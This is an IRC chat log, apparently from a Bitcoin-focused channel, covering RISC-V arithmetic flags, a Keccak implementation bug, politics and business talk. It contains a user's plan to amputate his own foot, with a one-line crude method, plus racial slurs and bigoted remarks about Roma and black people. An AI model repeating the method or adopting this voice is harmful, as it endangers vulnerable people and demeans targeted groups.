longer around." 1739634;1510853668;asciilifeform;the wreckers DELIBERATELY, unabashedly wrecked bignum performance for all time on their idiot shitiron 1739635;1510853678;asciilifeform;'it ruins the pipeline' 1739636;1510853697;asciilifeform;the sheer epic cixi... 1739637;1510853725;mircea_popescu;i don't get it, what does carry flag ruin ? 1739638;1510853735;asciilifeform;'introduces linkage between pipeline stages' 1739639;1510853748;mircea_popescu;what pipeline ? the cpu execution pipeline ? 1739640;1510853750;asciilifeform;aha 1739641;1510853772;mircea_popescu;ok this must be the dumbest thing i heard this week. 1739642;1510853783;mircea_popescu;why specifically the carry flag as opposed to you know, any other flag ? 1739643;1510853787;mircea_popescu;and for that matter any register ? 1739644;1510853792;asciilifeform;it's got no flags iirc. 1739645;1510853806;asciilifeform;the only way to detect overflow on risc-v is the algo i used in ffa. 1739646;1510853817;asciilifeform;with the extra xor and sub etc. 1739647;1510853820;mircea_popescu;"your mul was executed but we refuse to tell you what it came to because you might end up using that result somewhere" ? 1739648;1510853823;asciilifeform;aaha. 1739649;1510853847;asciilifeform;and, it gets 'better', risc-v is the Official(tm)(r) OpenSores cpu arch. 1739650;1510853861;mircea_popescu;i thought risc had a buncha cond flags 1739651;1510853868;asciilifeform;other riscs. 1739652;1510853875;mircea_popescu;ah. 1739653;1510853877;asciilifeform;but not the Troo RMS Linux Phoundation risc . 1739654;1510853890;mircea_popescu;apparently there's a lot i don't understand. 1739655;1510853894;mircea_popescu;such as... why ? 1739656;1510853909;asciilifeform;why wreckers wreck ? 1739657;1510853930;mircea_popescu;so there's no SWI in rms-risc ? 1739658;1510853957;asciilifeform;interrupt ? 1739659;1510853974;asciilifeform;it has interrupt, and jumps. 1739660;1510853975;mircea_popescu;no moar BL NV/EQ either ? 1739661;1510853989;asciilifeform;it's got jumps. but they blow the pipeline. 1739662;1510854008;mircea_popescu;is this actually used for anything ? 1739663;1510854022;asciilifeform;it is 'used' for 'being The Next Troo Libre RMStronic Cpu Arch' 1739664;1510854033;asciilifeform;same as hurd is 'used' . 1739665;1510854034;mircea_popescu;no but i mean concretely. 1739666;1510854088;asciilifeform;moar concretely they go around propagandizing that if you build a fpga board you gotta use it, because 'mips is patented' ( in what country ? even in usa patent is 25y ) or 'risc-v is simplest' ( uh, nope ) and other idiocy. 1739667;1510854109;asciilifeform;but nobody afaik sells a siliconized hard implementation of it. and i dun expect that anyone will. because wtf. 1739668;1510854111;mircea_popescu;so conference fodder, a buncha slideshares. cool. 1739669;1510854135;asciilifeform;they also managed to waste the time of compiler back-end people, linux kernel folx, etc. with it. 1739670;1510854150;mircea_popescu;can we not talk about it anymore when discussing risc ? the concept isn't actually without merit, as such. 1739671;1510854169;asciilifeform;so it's a first-class wrecking. sorta like what llvm used to be prior to apple crowning it. riscv is waiting for its apple. 1739672;1510854177;asciilifeform;risc is a massively broad item 1739673;1510854193;asciilifeform;i.e. 'reduced instruction set' comp 1739674;1510854210;mircea_popescu;"this cisc thing is too complex,. make a simple one" "why, so there can within a decade 'exist' a thousand different simplicities ?" 1739675;1510854224;asciilifeform;'risc-v' is a well-crafted attempt to steal the name, much like gypsies tried to steal even the name of the country they lived in 1739676;1510854254;mircea_popescu;ah, the whole "let's call gypsies romani now" thing ? 1739677;1510854273;asciilifeform;aaha 1739678;1510854288;mircea_popescu;some dudes organized a "congress" in 1971 in, of course, london. 1739679;1510854314;mircea_popescu;(amusingly, no romanian gypsies participated) 1739680;1510854351;mircea_popescu;they did lift a 1930s "gypsies of romania" congress flag tho. 1739681;1510854446;mircea_popescu;anyway. lulzy outshot of this megalomaniacal protestant thing ("world council of churches"). 1739682;1510854459;asciilifeform;loldon, the go-to leprosorium for 'governments in exile' of all sorts, eh 1739683;1510854470;asciilifeform;poles, ukrs, gypos 1739684;1510854482;mircea_popescu;not exactly. the place where pacepas went before dc was established, cca 1970s/1980s 1739685;1510854495;asciilifeform;it's mildly surprising he didn't end up in london 1739686;1510854499;asciilifeform;with rezun 1739687;1510854641;mircea_popescu;ah, right, post-ww2 reorg of gypsies also produced the gelem gelem thing 1739688;1510854657;asciilifeform;'The lack of a carry bit complicates multiple-precision arithmetic – GMP, MPFR ... RISC-V does not detect or flag most arithmetic errors, including overflow, underflow and divide by zero ... Most popular programming languages do not support checks for integer overflow, partly because most architectures impose a significant runtime penalty to check for overflow on integer arithmetic and partly because modulo arithmetic is sometim 1739689;1510854657;asciilifeform;es the desired behavior' didjaknow! 1739690;1510854671;mircea_popescu;twas a dubious time, lots got killed in the war, which is how eg lithuania ended up with ~none 1739691;1510854709;mircea_popescu;asciilifeform so what do i get from divide by 0 ? rng ? 1739692;1510854721;asciilifeform;'undefined' i bet. 1739693;1510854732;mircea_popescu;yes but experimentally. 1739694;1510854736;*;asciilifeform not tried 1739695;1510854774;asciilifeform;mircea_popescu: https://archive.is/8mp39 << from horse's mouth 1739696;1510854786;asciilifeform;'-1 was value seen in other simple implementations and drops out of simple hardware implementations.' 1739697;1510854806;mircea_popescu;so they use the register as an error flagh 1739698;1510854850;asciilifeform;that's not an error flag -- negative 1 is a legitimate result of dividing, e.g., 100 by -100 1739699;1510854895;asciilifeform;to say 'error flag' is not in line with reality of the situation -- the only correct answer to div-by-0 is eggog. and eggog != 'returns a value just like actual non-by-0 division might' 1739700;1510854901;mircea_popescu;what i mean is : the fact that div by 0 produces a non-uniform distribution of bits in the register suggests to me that it is NOT as flagless as it aims to pretend. 1739701;1510854921;asciilifeform;it isn't distinguishable from a conceivable legit division. 1739702;1510854924;mircea_popescu;gotta keep up to our representations, neh. 1739703;1510854939;asciilifeform;fwiw i know why it's -1 1739704;1510854945;mircea_popescu;asciilifeform i think i do too 1739705;1510854959;asciilifeform;if you remove the div0 trap from ffa, you end up likewise with a reg full of 1s. it's what knuth division produces when given a 0 divisor. 1739706;1510854966;mircea_popescu;~not honestly trying to divide. 1739707;1510854974;asciilifeform;well it 'tries' and tries... 1739708;1510854994;mircea_popescu;ah, produces all-bits-set huh 1739709;1510854998;asciilifeform;aha. 1739710;1510855006;mircea_popescu;ok i take it back, this actually makes sense. 1739711;1510855136;asciilifeform;!!up gabriel_laddel 1739712;1510855136;deedbot;gabriel_laddel voiced for 30 minutes. 1739713;1510855180;asciilifeform;just when i thought d00d must've vysotskyed long ago 1739714;1510855281;gabriel_laddel;asciilifeform nah. Same old thing -- selling M, treading bitch niggas and getting ~nowhere fast. 1739715;1510855299;asciilifeform;gabriel_laddel: why 'getting ~nowhere' despite 'selling' ? 1739716;1510855334;gabriel_laddel;~1 sale a month since last wave isn't enough. 1739717;1510855383;gabriel_laddel;Could do more, but my foot is busted & surgery takes ages to schedule b/c US 'healthcare' isn't etc. 1739718;1510855434;BingoBoingo; im getting at least 4, so. proceed. << Ok, Math/Communication continues 1739719;1510855441;gabriel_laddel;Speaking of which, am going to be performing self-amputation of right foot as it is in the way + I don't trust or want US doctors. 1739720;1510855456;asciilifeform;ugh 1739721;1510855483;gabriel_laddel;Anyone who gives me good resources (pubmed refs etc) can have the video whenever I get around to it 1739722;1510855576;BingoBoingo; ah sorry my bad, week/month nm << Number is strictly what the spot on the rack costs. Prototype "Basic Box" (AMD A8 5545 machine) should be arriving today for evaluation. 1739723;1510855598;BingoBoingo;gabriel_laddel: What's going on with the foot? 1739724;1510855624;BingoBoingo;Why not strap it into boot and let heal as it may 1739725;1510855644;mircea_popescu;you can't do self-amputation. 1739726;1510855644;gabriel_laddel;BingoBoingo right heel is totally shattered and collapsed into my upper foot. 1739727;1510855652;asciilifeform;BingoBoingo: iirc ( but for some reason can't find in log ) d00d fell off a roof 1739728;1510855694;gabriel_laddel;mircea_popescu why not? 1739729;1510855710;trinque;what the fuck. 1739730;1510855717;mircea_popescu;the medieval standard is "saw the bone and sink the stump in hot oil". this works, but you'll pass out. has to be a third person. 1739731;1510855760;mircea_popescu;moreover, the ~ only good thing to come out of the us is trauma medicine. 1739732;1510855768;mircea_popescu;makes 0 sense to eschew THAT part of it 1739733;1510855791;BingoBoingo;Also if amputaing taking off only the foot leaves small selection of expensive annoying prostheses. Knee offers more options 1739734;1510855813;mircea_popescu;trinque tbh i was expecting self-hacking is in the pipeline since about a year ago. 1739735;1510855829;mircea_popescu;BingoBoingo well, half tibia. what knee. 1739736;1510855829;trinque;some form of self-harm was never in question 1739737;1510855866;mircea_popescu;anyway. stupid idea, try something else. 1739738;1510855870;asciilifeform;i dun think we ever heard the full story of the roof thing either 1739739;1510855900;mircea_popescu;the elliot one or the gabriel one ? 1739740;1510855904;asciilifeform;the latter 1739741;1510855910;trinque;whatever comes of it, it's going to compress into "I'm not qualified to be free" 1739742;1510855924;gabriel_laddel;mircea_popescu Glad I brought this up. Am insured, have option of surgery. 1739743;1510855936;mircea_popescu;where's that beautiful delusionist mage thing. 1739744;1510855944;BingoBoingo;gabriel_laddel: Seriously get styling leather boots "Redwing Heritage" or sane world alternative (new, not broken in). Powder limb with with miconazole poweder and strap into the boot. 1739745;1510855948;asciilifeform;gabriel_laddel: so waitasec wai hacking off own leg then 1739746;1510855965;mircea_popescu;gabriel_laddel just go into er sometime that's not crazy (ie, not sunday at 4:10 am, not right after a shooting rampage etc. they'll sort it out) 1739747;1510855966;BingoBoingo;asciilifeform: Faster! 1739748;1510855984;gabriel_laddel;asciilifeform surgon irritates me on a personal level + the first time stanford tried it, they fucked up 1739749;1510856024;mircea_popescu;uh. 1739750;1510856026;ben_vulpes;how did you even come to fall off the roof, dude? 1739751;1510856033;trinque;"they fucked up turning my chalk dust of a heel into a foot again" 1739752;1510856047;*;trinque goes to perform constructive self harm at the gym 1739753;1510856050;gabriel_laddel;Fed me too much fluid prior to anaesthetic, which flooded lungs when knocked out. Ended up in ICU for 4 days. 1739754;1510856080;mircea_popescu;lol sounds like you've got a decent malpraxis case. 1739755;1510856128;BingoBoingo;Seriously, gabriel_laddel How many rack units do you want to lease once lawyer loves the surgeon's butthole a bit? 1739756;1510856144;gabriel_laddel;BingoBoingo I can't parse that. 1739757;1510856151;mircea_popescu;lol 1739758;1510856167;gabriel_laddel;ben_vulpes I jumped from one roof to the other with electricity. 1739759;1510856181;gabriel_laddel;ben_vulpes grabbed edge but couldn't pull myself up. 1739760;1510856216;BingoBoingo;gabriel_laddel: You are going to get a lawyer. Your lawyer is going to probe the surgeon's colon with his suing member over that lung fluid thing. You will have money. Might as well rent some rackspace and grow your small business. 1739761;1510856241;BingoBoingo; ben_vulpes grabbed edge but couldn't pull myself up. << Most other Americans can't do pull ups either. 1739762;1510856243;ben_vulpes;that's a pretty novice anaesthesia mistake 1739763;1510856290;gabriel_laddel;ben_vulpes Stanford hospital is a scary place. They lied to me MANY times about how many xrays I'd get, that they'd let me get copies... 1739764;1510856312;BingoBoingo;Well, you get copies from copy office 1739765;1510856341;BingoBoingo;Just haven't knocked the right door to find it yet? 1739766;1510856350;mircea_popescu;the lung flood anesthesia thing is pretty much textbook medical tort by now. 1739767;1510856375;ben_vulpes;i wonder if there's some "we're a learning hospital, might kill ya, gonna bill ya" going on 1739768;1510856390;ben_vulpes;scuse me, "teaching hospital" 1739769;1510856393;gabriel_laddel;ben_vulpes yep. 1739770;1510856406;mircea_popescu;"plox sign this here release" 1739771;1510856414;ben_vulpes;also, does your insurance somehow only cover the stanford hospital? 1739772;1510856425;mircea_popescu;lulz of all time. "say what ?" "you know, in case anything happens..." "yeees ?" 1739773;1510856439;gabriel_laddel;ben_vulpes I have nfi. Never used insurance before. 1739774;1510856444;ben_vulpes;because still on parental plan and they work at the department of bezzletronic edumacation ? 1739775;1510856454;BingoBoingo; scuse me, "teaching hospital" << Does not indemnify 1739776;1510856473;gabriel_laddel;Will compile a report with names of doctors & so forth from paperwork I have, this adhoc bs is silly. 1739777;1510856483;gabriel_laddel;(and my fault, of course) 1739778;1510856496;ben_vulpes;hey, show up with a crazy story, get a bunch of crazy questions 1739779;1510856505;mircea_popescu;BingoBoingo ben_vulpes wait, wait, they came up with a loophole in the whole "Standard of care" scam ? "as long as you doctor for stanford, you get to opt out of the usg lawyer insanity" ? 1739780;1510856520;BingoBoingo;gabriel_laddel: Open a phone book. Find the second biggest lawyer ad (i.e. takes one whole page instead of two) call them. today 1739781;1510856533;ben_vulpes;mircea_popescu: i have no idea what eldritch magick the stanford lawyer brigade has worked up 1739782;1510856536;BingoBoingo;mircea_popescu: They have not, but they will play like they have until you get specialist lawyer involved 1739783;1510856543;mircea_popescu;ah. i see. 1739784;1510856545;ben_vulpes;probably ^ 1739785;1510856557;BingoBoingo;Specialist being exactly the sort of lawyer who runs ads on daytime tv 1739786;1510856570;ben_vulpes;reminds me, i have my own willful violation of patient privacy case to get the ball rolling on 1739787;1510856586;ben_vulpes;BingoBoingo: who has a phone book tho 1739788;1510856593;mircea_popescu;it'd be pretty sweet for them if they manage, imagine the wonder "either slave for us or die out in the insane wilds". ideal stanfordism. kinds see why they'd pretend like it's the case -- in the hopes one day they can make it be the case. 1739789;1510856598;BingoBoingo;ben_vulpes: Surprisingly most doctor's offices 1739790;1510856634;BingoBoingo; Will compile a report with names of doctors & so forth from paperwork I have, this adhoc bs is silly. << You have no need to do this. Lawyer handles 1739791;1510856649;mircea_popescu;what's the take by now ? 45% ? 1739792;1510856665;BingoBoingo;mircea_popescu: Unsure. Varies county by county within each state 1739793;1510856670;mircea_popescu;a 1739794;1510856752;BingoBoingo;And the attraction of a Stanford for a doctor is exactly "take this salary, we'll put you on our insurance" 1739795;1510856765;mircea_popescu;aha. 1739796;1510856827;gabriel_laddel;BingoBoingo having dated an aspiring stanford doctor -- is where the failed engineers go. 1739797;1510856829;BingoBoingo;This means your remora of a lawyer has to be a specialist at this. It isn't podunk Doctor's malpractice carrier. It's Stanfords. 1739798;1510856886;BingoBoingo;The key to the US med mal racket however, is speed. You call the fucking lawyer TODAY gabriel_laddel 1739799;1510856917;gabriel_laddel;BingoBoingo am in el camino hospital right now, getting a phonebook & phone.. 1739800;1510856949;BingoBoingo;!!Up gabriel_laddel 1739801;1510856950;deedbot;gabriel_laddel voiced for 30 minutes. 1739802;1510856958;BingoBoingo;gabriel_laddel: Does your room have a TV? 1739803;1510856972;ben_vulpes;this is a surprising turning point, gabriel_laddel actually taking instruction 1739804;1510857001;BingoBoingo;gabriel_laddel: If your room has TV watch trashy daytime TV and count the commercials each lawyer has. 1739805;1510857003;gabriel_laddel;BingoBoingo am here to visit a friend in psyc ward, totally unrelated to my issue. 1739806;1510857017;ben_vulpes;tmsr as higher power of last resort 1739807;1510857022;mircea_popescu;meanwhile in strange swellings, http://78.media.tumblr.com/tumblr_m1wh8pw3hP1rs9xqgo1_1280.jpg 1739808;1510857033;BingoBoingo;gabriel_laddel: Still, watch the tv with friend. Have him check your count 1739809;1510857083;gabriel_laddel;ben_vulpes: tsmr as the only honest, straightforwards, USEFUL collection of humans I'm aware of... 1739810;1510857104;mircea_popescu;makes two of us. 1739811;1510857269;ben_vulpes;in other news, the anti-flirt brigade brought a democrat down today; "al franken" 1739812;1510857293;mircea_popescu;o noes. 1739813;1510857332;ben_vulpes;but it couldn't happen, pantsuit tools clearly can only ever be used by them against their enemies 1739814;1510857341;ben_vulpes;no troo pantsuit! 1739815;1510857373;mircea_popescu;well, in that they're not so much tools as collected nonsense. 1739816;1510857386;BingoBoingo;!~ticker market all 1739817;1510857387;jhvh1;BingoBoingo: (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market |all]) -- Return pretty-printed ticker. Default market is Bitfinex. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure the code is a valid (1 more message) 1739818;1510857398;BingoBoingo;!~ticker --market all 1739819;1510857405;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7747.8, vol: 16460.21925547 | Bitfinex BTCUSD last: 7733.4, vol: 65530.71994791 | Kraken BTCUSD last: 7630.0, vol: 8159.70132689 | Volume-weighted last average: 7726.67030894 1739820;1510857411;mircea_popescu;holy. 1739821;1510857426;BingoBoingo; in other news, the anti-flirt brigade brought a democrat down today; "al franken" << Oh, is he the one who molested the black muscle guy? 1739822;1510857428;mircea_popescu;i thought bitcoin cash was taking over, wtf happened. 1739823;1510857489;BingoBoingo;gabriel_laddel started taking instruction? 1739824;1510859148;BingoBoingo;!!up PeterL 1739825;1510859149;deedbot;PeterL voiced for 30 minutes. 1739826;1510859269;PeterL;http://btcbase.org/log/2017-11-16#1739503 << http://p.bvulpes.com/pastes/NrPiu/?raw=true << the 0,0 row is not moved and not shifted (actually the paper calls it shifted by 0), I think the function should return full 0 state if fed a full 0 state 1739827;1510859269;a111;Logged on 2017-11-16 14:37 diana_coman: PeterL, did you test your permutation step functions on that keccak implementation? when I feed rho a full-zero state it seems to end up with non-zero output 1739828;1510859827;PeterL;I guess that was more answering http://btcbase.org/log/2017-11-16#1739548 1739829;1510859827;a111;Logged on 2017-11-16 15:23 diana_coman: aand found the bug at least on this one: rho initialises Ar(0,0) BUT uses then first thing...Ar(1,0) 1739830;1510859939;PeterL;rho starts with setting Ar(0,0) to A(0,0), then loops over the rest of the Ar(0,1) to Ar(4,4) so the function does set all 25 lanes 1739831;1510860099;PeterL;A being the input array and Ar being the output array; I was trying to follow notation as in the paper, but they use a and A, which ada does not allow 1739832;1510860702;asciilifeform;meanwhile, in heathendom, https://twitter.com/getongab/status/930572995306721280 1739833;1510860936;mircea_popescu;lmao what is this ridiculous nonsense ? 1739834;1510860947;diana_coman;PeterL, hm; it seems though to end up with funny stuff if the output array is not initialised 1739835;1510860953;diana_coman;will look at it again 1739836;1510860967;diana_coman;!!up PeterL 1739837;1510860967;deedbot;PeterL voiced for 30 minutes. 1739838;1510860999;mircea_popescu;rando indian is somehow in a position to speak for "ethereum", an on-again-off-again acquarium of rank imbeciles who couldnt manage to as much as paint the basement they inhabited, if it came to it ? 1739839;1510861017;mircea_popescu;too many failure levels. who the fuck is vinay gupta and what the fuck is ethereum to opine on things ? 1739840;1510861116;ben_vulpes;> Attempting to make it culturally and socially impossible for neonazis to migrate to the Etherum platform is, in my opinion, necessary for its survival. We cannot censor, but we can and must fight on every other level to dissuade these people from colonizing our utopian efforts. 1739841;1510861133;mircea_popescu;anyway. pretty fucking epic keks. ethereum became a sort of jokecoin after the rape, which i suppose brings the moral home : rape is educative. 1739842;1510861134;ben_vulpes;> This is our watch: keep nazis off decentralize uncensorable platforms! 1739843;1510861173;mircea_popescu;ben_vulpes really, ideal ceo from a comedy gold delivery perspective. 1739844;1510861189;ben_vulpes;i cannot fathom the confusion of ideas that would lead someone to say such a thing 1739845;1510861202;ben_vulpes;brain must have cooked through at burning man 1739846;1510861330;mircea_popescu;the french approach : since we know we can't win, might as well burn the stack down in a memorable way. 1739847;1510861827;asciilifeform;apre moi le shitdeluge 1739848;1510861846;mircea_popescu;better than the doge fizzle. 1739849;1510861857;mircea_popescu;(~100% eth equivalent for the 2015 tardcrowd) 1739850;1510861955;asciilifeform;oblig: http://btcbase.org/log/2017-11-09#1735502 1739851;1510861955;a111;Logged on 2017-11-09 19:39 asciilifeform: meanwhile in entomologies, http://yahozna.dyndns.org/scratch/loser.gif 1739852;1510861981;asciilifeform;^ inextricably linked in asciilifeform's head nao with phrase 'since we can't win...' 1739853;1510862002;mircea_popescu;o hey, we have a resolution! http://p.bvulpes.com/pastes/vtDXh/?raw=true 1739854;1510862021;mircea_popescu;(thum being thomas umbach, the one man behind the ~one man orchestra involved) 1739855;1510862033;asciilifeform;ahahahaha 1739856;1510862053;mircea_popescu;hey. decisive beats piddly irrespective of any other considerations. 1739857;1510862064;asciilifeform;was gonna say. at least was upfront. 1739858;1510862104;asciilifeform;'we're funded privately' << can you say inqtel folx ? yeswecan! 1739859;1510862126;mircea_popescu;nah, moar likely wife's father sorta deal. 1739860;1510862142;asciilifeform;inqtel's missing out on the 'next tor' then. 1739861;1510862179;mircea_popescu;intel can't possibly throw money at every "allied" orcdom's here's-our-rack thing. 1739862;1510862182;asciilifeform;in-q-tel 1739863;1510862186;asciilifeform;!#s in-q-tel 1739864;1510862186;a111;11 results for "in-q-tel", http://btcbase.org/log-search?q=in-q-tel 1739865;1510862192;mircea_popescu;yes yes\ 1739866;1510862207;asciilifeform;and at every no. but not so many of these. 1739867;1510862221;mircea_popescu;plenty. this is what, 2nd this week ? 1739868;1510862226;asciilifeform;(i.e. specifically 'fleadom'-flavoured item ) 1739869;1510862253;mircea_popescu;i guess/ 1739870;1510862370;mircea_popescu;reich media/wikipedia greatly overstate both the reach and the capital available to teh gestapo. 1739871;1510862420;asciilifeform;iirc i dug up & posted the tax filings from inqtel here a few yrs back 1739872;1510862456;asciilifeform;iirc added up to 100megabux or so / yr 1739873;1510862469;mircea_popescu;did they get moar "oh usg decided to "sell" keyhole to google thereby inqtel has a coupla mn dollars now" sortas items ? 1739874;1510862489;mircea_popescu;asciilifeform the number is ~same as say "ethereum market cap". if you trust the printers, it's whatever they print. 1739875;1510862495;asciilifeform;probably. i have not been keeping up in realtime. 1739876;1510862520;asciilifeform;and noshit it isn't as if they pay in btc or gold, 100% printolade-powered item 1739877;1510862539;mircea_popescu;if they find four more of the same thing, they can almost pay for that yacht the current saudi boy wonder beached while driving drunk coupla years ago. 1739878;1510862571;asciilifeform;and naturally i have nfi what's in the second set of books they keep -- for all i know they ~did~ pay for that yacht. 1739879;1510862580;mircea_popescu;"apple could buy russia and inqtel could buy a fifth of mohammad bin salman's drunken romp" 1739880;1510862604;mircea_popescu;asciilifeform no need, saudis are rich. and unlike all the OTHER princes, this one totally uncorrupt and errything :D 1739881;1510862630;asciilifeform;lol 1739882;1510862678;mircea_popescu;how fucking dumb teh remains of usg.blue must be to re-do the ~exact~ ukraine failure is anyone's guess... 1739883;1510862699;mircea_popescu;recall the pics with that tall schmuck and kerry pressed together into a us-made floating sardine can 1739884;1510862722;asciilifeform;they've been replaying the exact same program ever since it worked for killing the old shoemaker. 1739885;1510862772;mircea_popescu;what the fuck was his name, the eager brunette cocksucker. 1739886;1510862838;asciilifeform;usg.blue quite like the stereotypical idjit gambler, wearing ancient crusty shirt he once jackpotted in 1739887;1510862941;*;mircea_popescu is too lazy to dig the pics up. for all teh diff it makes... 1739888;1510863426;mircea_popescu;asciilifeform ftr, i'm rather doubtful as to actual usg involvement in that. seems a case of "hitchhiker comes across bute, pushes it into the chasm below". well, it's true that "hitchhiker pushed as hard as he could", but it's also true that he didn;t make or specifically find bute. 1739889;1510863452;mircea_popescu;geological phenomena are not specifically open to human "performance" claims lest we end up inventing a new set of sun priest outfits for ourselves. 1739890;1510863486;asciilifeform;in other lulz, asciilifeform unpacks a small crate of b00kz from ru, and finds that the rus-ro dictionary, shrinkwrapped, but inside : item from 1942 ! 1739891;1510863501;mircea_popescu;(ie, the false belief that "i pushed - rock obeyed" is dangerous to the "successful" pusher first and foremost -- in a decade or two he finds himself in the laughable position of kerry & friends) 1739892;1510863510;mircea_popescu;o hey! 1739893;1510863548;asciilifeform;i've picked up 'old-new stock' before, but this is somethingelse. 1739894;1510863708;asciilifeform;mircea_popescu: and yes, it was exactly 'jackpot shirt' 1739895;1510863735;ben_vulpes;> libre 1739896;1510863741;ben_vulpes;> allergic to notion of nato reich 1739897;1510863743;ben_vulpes;wat 1739898;1510863783;asciilifeform;ben_vulpes: exactly like every other 'let's tor, let's wank to isidora whorecraft watshername' folx, neh 1739899;1510863823;asciilifeform;aka usg.blue 1739900;1510863999;ben_vulpes;what does 'blue' indicate here? 1739901;1510864023;asciilifeform;ben_vulpes: iirc originally taken from colours of old usa electoral map 1739902;1510864080;asciilifeform;here applies to the 'soft power' species of usgcrat ( in contrast with 'red' , 'weapons of mass destruction!' species ) 1739903;1510864100;asciilifeform;think 'tor', 'voice of america', 'internationalkomyooniti' people. 1739904;1510864123;ben_vulpes;hm 1739905;1510864133;ben_vulpes;is there some 'color revolution' subtext to it as well? 1739906;1510864161;asciilifeform;folx in question are the orig authors of the concept, yes 1739907;1510864311;asciilifeform;https://archive.is/FpOIq << in other 'red' lulz. 1739908;1510864738;mircea_popescu;ben_vulpes there's this theory whereby usg oligarchy (ie, the pile of fundamentally corrupt underpinnings of the state, as all state ever is based on corruption nad naught else, which is why colonizers attempt to "root out corruption" in colonial posessions) is split into red section (raytheon and friends) and blue section (stanford and friends) 1739909;1510864844;BingoBoingo;http://btcbase.org/log/2017-11-16#1739440 << Update on the proceeding, not-gypsy letter from self's current bank schedule to arrive in 7-10 days. Puts departure around December 1st. Hunting any other sources of delay out. 1739910;1510864844;a111;Logged on 2017-11-16 13:15 mircea_popescu: im getting at least 4, so. proceed. 1739911;1510864866;mircea_popescu;there's a great southpark episode explaining how this false dychotomy is intended to work in practice (i'm a bit couintry & im a bit rock and roll item) 1739912;1510864930;mircea_popescu;https://www.youtube.com/watch?v=T8jvEJngh4M << item 1739913;1510865146;ben_vulpes;neato BingoBoingo 1739914;1510865170;mircea_popescu;i r get notice this exists in proper text format, so let's put it in teh archive then http://southpark.wikia.com/wiki/I%27m_a_Little_Bit_Country/Script 1739915;1510867213;BingoBoingo;ben_vulpes: How many RU are you interested in? 1739916;1510867312;mircea_popescu;BingoBoingo learned teh hard sell at the school of hard knocks. 1739917;1510867543;BingoBoingo;mircea_popescu: lol gotta get the rack full to make the math work 1739918;1510867565;BingoBoingo;Also selling grass seed at the BingoBoingo store 1739919;1510867684;*;BingoBoingo sells grass seed like so: Are you starting over or overseeding? How big of an area of your covering? These two products are the only things regionally appropriate here. You will buy X bags of A or Y bags of B. Which do you want? 1739920;1510867741;mircea_popescu;does it work ? 1739921;1510867989;BingoBoingo;Always. 1739922;1510868012;BingoBoingo;Protests are met with explanations of their idea's inadequacies. 1739923;1510868018;mircea_popescu;men and women equally well ? 1739924;1510868055;BingoBoingo;Works smoothest with women under 40. Old women and old men protest most before surrendering. 1739925;1510868086;mircea_popescu;the supply store, like a snowball! 1739926;1510868088;BingoBoingo;Occasional fool goes for "Kentucky 31" tall fescue instead and wonders why their yard looks like a weedy lime green wheat field later 1739927;1510868173;BingoBoingo;Weed control sales interactions are even more hard ball. 1739928;1510868235;BingoBoingo;But smoother except for black men who have trouble understanding the mechanics of poisoning and aren't afraid to hide their ignorace through protest. 1739929;1510868630;deedbot;http://trilema.com/2017/mimi-metallurgico-ferito-nellonore/ << Trilema - Mimi metallurgico ferito nell'onore 1739930;1510870673;diana_coman;http://btcbase.org/log/2017-11-16#1739830 <- PeterL you are right in that problem with your rho was more subtle: it *should* set all lanes but it didn't because of how new coordinates were calculated; basically you lose old x in the process and end up calculating newY as 5*oldY instead of 2*oldX+3*oldY 1739931;1510870673;a111;Logged on 2017-11-16 19:18 PeterL: rho starts with setting Ar(0,0) to A(0,0), then loops over the rest of the Ar(0,1) to Ar(4,4) so the function does set all 25 lanes 1739932;1510871451;asciilifeform;http://btcbase.org/log/2017-11-16#1739909 << oh hey BingoBoingo has place to move to in south amer nao ?? 1739933;1510871451;a111;Logged on 2017-11-16 20:40 BingoBoingo: http://btcbase.org/log/2017-11-16#1739440 << Update on the proceeding, not-gypsy letter from self's current bank schedule to arrive in 7-10 days. Puts departure around December 1st. Hunting any other sources of delay out. 1739934;1510871554;asciilifeform;http://btcbase.org/log/2017-11-16#1739930 << this was probably the most frequent logical mistake asciilifeform made when writing first draft of ffa ( in particular, the shifts ) 1739935;1510871554;a111;Logged on 2017-11-16 22:17 diana_coman: http://btcbase.org/log/2017-11-16#1739830 <- PeterL you are right in that problem with your rho was more subtle: it *should* set all lanes but it didn't because of how new coordinates were calculated; basically you lose old x in the process and end up calculating newY as 5*oldY instead of 2*oldX+3*oldY 1739936;1510871579;asciilifeform;always ask 'what happens if the output and input are same memory' 1739937;1510871595;asciilifeform;or, worse yet, overlap partially. 1739938;1510871963;BingoBoingo;asciilifeform: Have datacenter, working on details that surround that 1739939;1510872110;asciilifeform;!~later tell ben_vulpes https://github.com/threonorm/simulisp/blob/master/SCHEME-79/SCHEME-79%20Lisp%20on%20a%20chip.pdf << ( yes, pdf, it's an ancient scan, 1981 ) very spiffy review article by sussman re the famous scheme79 chip; also pertinent to anyone writing simple lisptrons of whatever kind 1739940;1510872110;jhvh1;asciilifeform: The operation succeeded. 1739941;1510872117;asciilifeform;spyked ^ et al 1739942;1510872198;asciilifeform;( see also http://btcbase.org/log/2017-11-14#1738302 and elsewhere ) 1739943;1510872198;a111;Logged on 2017-11-14 20:45 phf: it's funny that 36xx series is basically an improved cadr. ivory on the other hand? literally scheme86: they poached both the main guy who worked on the cpu ~and the entire toolset~. ivory was still designed on CADR (rather than smbx), because that's where scheme team designed theirs 1739944;1510872293;asciilifeform;BingoBoingo: neato 1739945;1510872317;asciilifeform;for some reason asciilifeform immediately pictured BingoBoingo living inside a 42u cabinet, diogenes-style 1739946;1510872631;BingoBoingo;asciilifeform: Well, after whatever hotel comes with flight may be living in hostel dorm for first few months. 1739947;1510872655;BingoBoingo;Which will of course cost ~100-150 more than fiscal address will 1739948;1510873484;PeterL;http://btcbase.org/log/2017-11-16#1739930 << damn, kindergarten level mistake there. I am used to thinking like in python you can do x,y = y, x+y or whatever 1739949;1510873484;a111;Logged on 2017-11-16 22:17 diana_coman: http://btcbase.org/log/2017-11-16#1739830 <- PeterL you are right in that problem with your rho was more subtle: it *should* set all lanes but it didn't because of how new coordinates were calculated; basically you lose old x in the process and end up calculating newY as 5*oldY instead of 2*oldX+3*oldY 1739950;1510878268;asciilifeform;in other lulz, http://www.nitehawk.com/rasmit/dsp50.html << 'amateur radio' people. but only linked for the hilarious javascript malware that the dumb schmuck ended up silently hosting, by using 'webcounter' , http://wotpaste.cascadianhacker.com/pastes/P3ywj/?raw=true , results in loading http://wotpaste.cascadianhacker.com/pastes/Z4dlh/?raw=true crapola , 1739951;1510878287;asciilifeform;and invites chumper to install 